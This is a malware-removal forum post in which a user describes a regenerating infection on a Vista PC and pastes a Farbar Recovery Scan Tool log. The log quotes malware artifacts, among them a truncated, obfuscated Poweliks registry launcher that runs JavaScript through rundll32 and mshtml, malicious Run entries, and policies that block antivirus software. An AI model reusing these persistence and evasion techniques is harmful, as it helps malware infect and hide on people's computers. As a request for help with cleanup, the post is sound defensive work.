
Regenerating Bug



Good afternoon,

 

I have an infection on a friend's PC running Vista Home Premium 32-bit SP2 that is driving me to drink. I have tried to remove it myself using various tools but any progress I make is undone within minutes by this malware. So far, Combofix has listed a ZeroAccess rootkit that it has removed. MBAM has shown and allegedly removed 2 trojans. The first was a dropper.ed and agent.ed. The second one I don't remember the name of exactly. It was something along the lines of Milsap or some such. Chrome-like browser windows appear on their own with an IP address as the URL (one of which is from Scranton, PA I found out). The IPs cycle through in this order: 206.51.231.110, 66.197.157.20, 184.173.181.55 and operate under a process known as browser.exe. Each Chrome-like window stays up for a few seconds until the "unresponsive page" warning appears and the browser closes. It is followed by another soon after. Chrome itself is not installed on this computer. I followed the browser.exe process to the following directory: LocalLow/UIMobile/ValidatorVisual. Deleting either ValidatorVisual or UIMobile directories only fixes the issue until it regenerates. Upon deleting the UIMobile directory, the first file to return is titled JawaVinyl.pac, has a size of ~44,762KB, and is (given the extension) a proxy auto configuration file. On the various scans that I've run, some have pointed out that the computer is configured to use a proxy of the 127.0.0.1 port 5555. Looking at the connection settings under Internet Options, the computer is not configured to automatically detect nor use a hard-coded proxy.

 

Per the sticky, here are the FRST.txt and Addition.txt logs. I have been working on this at work. So, any references to the proxy address of 192.168.0.101:3128 are legit, as that is my employer's CentOS web proxy. Thanks in advance for your help.

 

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 23-08-2014 16:54:35
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [irfuqApivh] => regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat"
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {a906d2bc-6084-11e3-9d8a-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [swg] => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\RunOnce: [spchecker] => C:\Program Files\AVG\AVG10\Notification\SPCheckerTE.exe [390472 2011-12-22] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
URLSearchHook: HKCU - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} -  No File
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-08-23] (Malwarebytes Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:23 - 2014-08-23 11:25 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk
2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-23 16:20 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-23 16:16 - 00000000 ____D () C:\Qoobox
